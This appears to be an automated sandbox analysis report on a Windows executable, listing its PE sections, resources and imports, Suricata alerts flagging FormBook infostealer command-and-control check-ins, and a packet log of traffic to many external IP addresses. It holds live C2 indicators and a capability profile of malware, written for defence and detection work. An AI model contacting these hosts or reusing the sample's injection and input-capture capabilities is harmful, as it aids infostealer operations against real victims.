.text	0x1000	0x8061c	0x80800	61ffce4768976fa0dd2a8f6a97b1417a	False	0.5583182605787937	data	6.684690148171278	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x82000	0xdfc0	0xe000	0354bc5f2376b5e9a4a3ba38b682dff1	False	0.36085728236607145	data	4.799741132252136	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x90000	0x1a758	0x6800	8033f5a38941b4685bc2299e78f31221	False	0.15324519230769232	data	2.1500715391677487	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xab000	0x9328	0x9400	495451d7eb8326bd9fa2714869ea6de8	False	0.49002322635135137	data	5.541804843154628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xab5c8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xab6f0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xab818	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xab940	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	Great Britain	0.48109756097560974
RT_ICON	0xabfa8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	Great Britain	0.5672043010752689
RT_ICON	0xac290	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	Great Britain	0.6418918918918919
RT_ICON	0xac3b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	Great Britain	0.7044243070362474
RT_ICON	0xad260	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	Great Britain	0.8077617328519856
RT_ICON	0xadb08	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	Great Britain	0.5903179190751445
RT_ICON	0xae070	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.5503112033195021
RT_ICON	0xb0618	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.6050656660412758
RT_ICON	0xb16c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.7553191489361702
RT_MENU	0xb1b28	0x50	data	English	Great Britain	0.9
RT_DIALOG	0xb1b78	0xfc	data	English	Great Britain	0.6507936507936508
RT_STRING	0xb1c78	0x530	data	English	Great Britain	0.33960843373493976
RT_STRING	0xb21a8	0x690	data	English	Great Britain	0.26964285714285713
RT_STRING	0xb2838	0x4d0	data	English	Great Britain	0.36363636363636365
RT_STRING	0xb2d08	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xb3308	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xb3968	0x388	data	English	Great Britain	0.377212389380531
RT_STRING	0xb3cf0	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.502906976744186
RT_GROUP_ICON	0xb3e48	0x84	data	English	Great Britain	0.6439393939393939
RT_GROUP_ICON	0xb3ed0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xb3ee8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xb3f00	0x14	data	English	Great Britain	1.25
RT_VERSION	0xb3f18	0x19c	data	English	Great Britain	0.5339805825242718
RT_MANIFEST	0xb40b8	0x26c	ASCII text, with CRLF line terminators	English	United States	0.5145161290322581

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll	VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll	WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL	EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll	HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll	GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll	DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll	DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll	VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-12T07:54:34.556282+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.7	49744	TCP
2024-11-12T07:54:52.798578+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49842	206.119.185.141	80	TCP
2024-11-12T07:55:08.918565+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49929	199.59.243.227	80	TCP
2024-11-12T07:55:11.434947+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49940	199.59.243.227	80	TCP
2024-11-12T07:55:13.700009+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.7	49951	TCP
2024-11-12T07:55:13.983322+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49957	199.59.243.227	80	TCP
2024-11-12T07:55:16.531108+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49970	199.59.243.227	80	TCP
2024-11-12T07:55:22.274590+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49975	66.29.146.173	80	TCP
2024-11-12T07:55:24.852644+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49976	66.29.146.173	80	TCP
2024-11-12T07:55:27.361207+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49977	66.29.146.173	80	TCP
2024-11-12T07:55:30.041123+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49978	66.29.146.173	80	TCP
2024-11-12T07:55:36.050838+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49979	209.74.64.58	80	TCP
2024-11-12T07:55:38.603170+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49980	209.74.64.58	80	TCP
2024-11-12T07:55:41.177007+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49981	209.74.64.58	80	TCP
2024-11-12T07:55:43.699906+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49982	209.74.64.58	80	TCP
2024-11-12T07:55:50.395829+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49983	85.159.66.93	80	TCP
2024-11-12T07:55:52.943858+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49984	85.159.66.93	80	TCP
2024-11-12T07:55:55.504331+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49985	85.159.66.93	80	TCP
2024-11-12T07:55:57.558872+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49986	85.159.66.93	80	TCP
2024-11-12T07:56:06.206544+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49987	20.2.208.137	80	TCP
2024-11-12T07:56:08.816029+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49988	20.2.208.137	80	TCP
2024-11-12T07:56:11.503533+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49989	20.2.208.137	80	TCP
2024-11-12T07:56:13.988282+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49990	20.2.208.137	80	TCP
2024-11-12T07:56:19.874501+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49991	13.248.169.48	80	TCP
2024-11-12T07:56:22.420545+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49992	13.248.169.48	80	TCP
2024-11-12T07:56:24.924597+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49993	13.248.169.48	80	TCP
2024-11-12T07:56:27.509078+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49994	13.248.169.48	80	TCP
2024-11-12T07:56:33.171852+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49995	96.126.123.244	80	TCP
2024-11-12T07:56:35.734292+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49996	96.126.123.244	80	TCP
2024-11-12T07:56:38.275804+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49997	96.126.123.244	80	TCP
2024-11-12T07:56:40.805148+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	49998	96.126.123.244	80	TCP
2024-11-12T07:56:46.477057+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	49999	3.33.130.190	80	TCP
2024-11-12T07:56:49.031344+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50000	3.33.130.190	80	TCP
2024-11-12T07:56:51.577208+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50001	3.33.130.190	80	TCP
2024-11-12T07:56:54.126723+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50002	3.33.130.190	80	TCP
2024-11-12T07:57:00.227753+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50003	104.21.69.93	80	TCP
2024-11-12T07:57:02.796114+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50004	104.21.69.93	80	TCP
2024-11-12T07:57:05.392125+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50005	104.21.69.93	80	TCP
2024-11-12T07:57:08.069276+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50006	104.21.69.93	80	TCP
2024-11-12T07:57:14.274613+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50007	172.67.221.220	80	TCP
2024-11-12T07:57:16.873749+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50008	172.67.221.220	80	TCP
2024-11-12T07:57:19.407623+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50009	172.67.221.220	80	TCP
2024-11-12T07:57:22.281581+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50010	172.67.221.220	80	TCP
2024-11-12T07:57:28.317647+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50011	91.184.0.200	80	TCP
2024-11-12T07:57:30.869209+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50012	91.184.0.200	80	TCP
2024-11-12T07:57:33.384394+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50013	91.184.0.200	80	TCP
2024-11-12T07:57:35.911493+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50014	91.184.0.200	80	TCP
2024-11-12T07:57:41.918713+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50015	217.160.0.60	80	TCP
2024-11-12T07:57:44.474328+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50016	217.160.0.60	80	TCP
2024-11-12T07:57:47.693140+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50017	217.160.0.60	80	TCP
2024-11-12T07:57:49.604746+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50018	217.160.0.60	80	TCP
2024-11-12T07:57:56.063684+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50019	161.97.142.144	80	TCP
2024-11-12T07:57:58.407567+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50020	161.97.142.144	80	TCP
2024-11-12T07:58:01.078624+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50021	161.97.142.144	80	TCP
2024-11-12T07:58:04.763096+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50022	161.97.142.144	80	TCP
2024-11-12T07:58:11.200700+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50023	144.76.190.39	80	TCP
2024-11-12T07:58:13.662219+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50024	144.76.190.39	80	TCP
2024-11-12T07:58:16.209174+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.7	50025	144.76.190.39	80	TCP
2024-11-12T07:58:18.771726+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.7	50026	144.76.190.39	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 07:54:51.768837929 CET	49842	80	192.168.2.7	206.119.185.141
Nov 12, 2024 07:54:51.773775101 CET	80	49842	206.119.185.141	192.168.2.7
Nov 12, 2024 07:54:51.773910046 CET	49842	80	192.168.2.7	206.119.185.141
Nov 12, 2024 07:54:51.782474995 CET	49842	80	192.168.2.7	206.119.185.141
Nov 12, 2024 07:54:51.787406921 CET	80	49842	206.119.185.141	192.168.2.7
Nov 12, 2024 07:54:52.749063015 CET	80	49842	206.119.185.141	192.168.2.7
Nov 12, 2024 07:54:52.798578024 CET	49842	80	192.168.2.7	206.119.185.141
Nov 12, 2024 07:54:52.934957027 CET	80	49842	206.119.185.141	192.168.2.7
Nov 12, 2024 07:54:52.935179949 CET	49842	80	192.168.2.7	206.119.185.141
Nov 12, 2024 07:54:52.936707020 CET	49842	80	192.168.2.7	206.119.185.141
Nov 12, 2024 07:54:52.941448927 CET	80	49842	206.119.185.141	192.168.2.7
Nov 12, 2024 07:55:08.265872955 CET	49929	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:08.270804882 CET	80	49929	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:08.270910025 CET	49929	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:08.282141924 CET	49929	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:08.287868023 CET	80	49929	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:08.918442011 CET	80	49929	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:08.918503046 CET	80	49929	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:08.918565035 CET	49929	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:08.919020891 CET	80	49929	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:08.919095039 CET	49929	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:09.783538103 CET	49929	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:10.802700996 CET	49940	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:10.807610989 CET	80	49940	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:10.807682991 CET	49940	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:10.821254015 CET	49940	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:10.826102972 CET	80	49940	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:11.434881926 CET	80	49940	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:11.434900045 CET	80	49940	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:11.434947014 CET	49940	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:11.435534954 CET	80	49940	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:11.435581923 CET	49940	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:12.330476999 CET	49940	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:13.349149942 CET	49957	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:13.353923082 CET	80	49957	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:13.355082035 CET	49957	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:13.366719007 CET	49957	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:13.371710062 CET	80	49957	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:13.371721983 CET	80	49957	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:13.983257055 CET	80	49957	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:13.983273983 CET	80	49957	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:13.983321905 CET	49957	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:13.983714104 CET	80	49957	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:13.983768940 CET	49957	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:14.877305031 CET	49957	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:15.898905993 CET	49970	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:15.903872967 CET	80	49970	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:15.903964043 CET	49970	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:15.929229975 CET	49970	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:15.934154034 CET	80	49970	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:16.530816078 CET	80	49970	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:16.530895948 CET	80	49970	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:16.530916929 CET	80	49970	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:16.531107903 CET	49970	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:16.531153917 CET	49970	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:16.534272909 CET	49970	80	192.168.2.7	199.59.243.227
Nov 12, 2024 07:55:16.539110899 CET	80	49970	199.59.243.227	192.168.2.7
Nov 12, 2024 07:55:21.599870920 CET	49975	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:21.604748964 CET	80	49975	66.29.146.173	192.168.2.7
Nov 12, 2024 07:55:21.604892969 CET	49975	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:21.616841078 CET	49975	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:21.621701956 CET	80	49975	66.29.146.173	192.168.2.7
Nov 12, 2024 07:55:22.274498940 CET	80	49975	66.29.146.173	192.168.2.7
Nov 12, 2024 07:55:22.274524927 CET	80	49975	66.29.146.173	192.168.2.7
Nov 12, 2024 07:55:22.274590015 CET	49975	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:22.312905073 CET	80	49975	66.29.146.173	192.168.2.7
Nov 12, 2024 07:55:22.313133955 CET	49975	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:23.127522945 CET	49975	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:24.146254063 CET	49976	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:24.151204109 CET	80	49976	66.29.146.173	192.168.2.7
Nov 12, 2024 07:55:24.151305914 CET	49976	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:24.163618088 CET	49976	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:24.169132948 CET	80	49976	66.29.146.173	192.168.2.7
Nov 12, 2024 07:55:24.852574110 CET	80	49976	66.29.146.173	192.168.2.7
Nov 12, 2024 07:55:24.852590084 CET	80	49976	66.29.146.173	192.168.2.7
Nov 12, 2024 07:55:24.852643967 CET	49976	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:24.892067909 CET	80	49976	66.29.146.173	192.168.2.7
Nov 12, 2024 07:55:24.892151117 CET	49976	80	192.168.2.7	66.29.146.173
Nov 12, 2024 07:55:25.685973883 CET	49976	80	192.168.2.7	66.29.146.173
